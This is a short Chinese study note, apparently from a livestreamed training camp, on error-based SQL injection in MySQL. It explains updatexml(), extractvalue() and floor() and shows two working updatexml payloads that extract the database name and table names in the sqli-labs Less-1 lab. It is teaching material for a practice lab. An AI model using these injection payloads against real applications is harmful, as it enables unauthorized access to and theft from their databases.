冬令营线上直播学习笔记4——SQL注入报错注入

本文主要是介绍冬令营线上直播学习笔记4——SQL注入报错注入，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

一、理论知识

1.什么是报错注入？
在MySQL中使用一些指定的函数来制造报错，后台没有屏蔽数据库的报错信息，在语法输入错误的时候将信息输出前端显示，我们可以从报错信息中获取信息。

2.报错注入常用的函数
updatexml()：xml文档数据进行查询和修改的XPATH函数
extractvalue()：xml文档数据进行查询和修改的XPATH函数
floor()：数据库中取整的函数

二、实验

这里的实验是对sqli-labs的Less-1 进行报错注入攻击实战。

1.爆数据库名。
and updatexml(1,concat(0x7e,(select database()),0x7e),1)

• 0x3a是冒号的十六进制
  0x3b是分号的十六进制
  0x7e是~符号的十六进制编码

2.爆数据表名。
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)

这篇关于冬令营线上直播学习笔记4——SQL注入报错注入的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---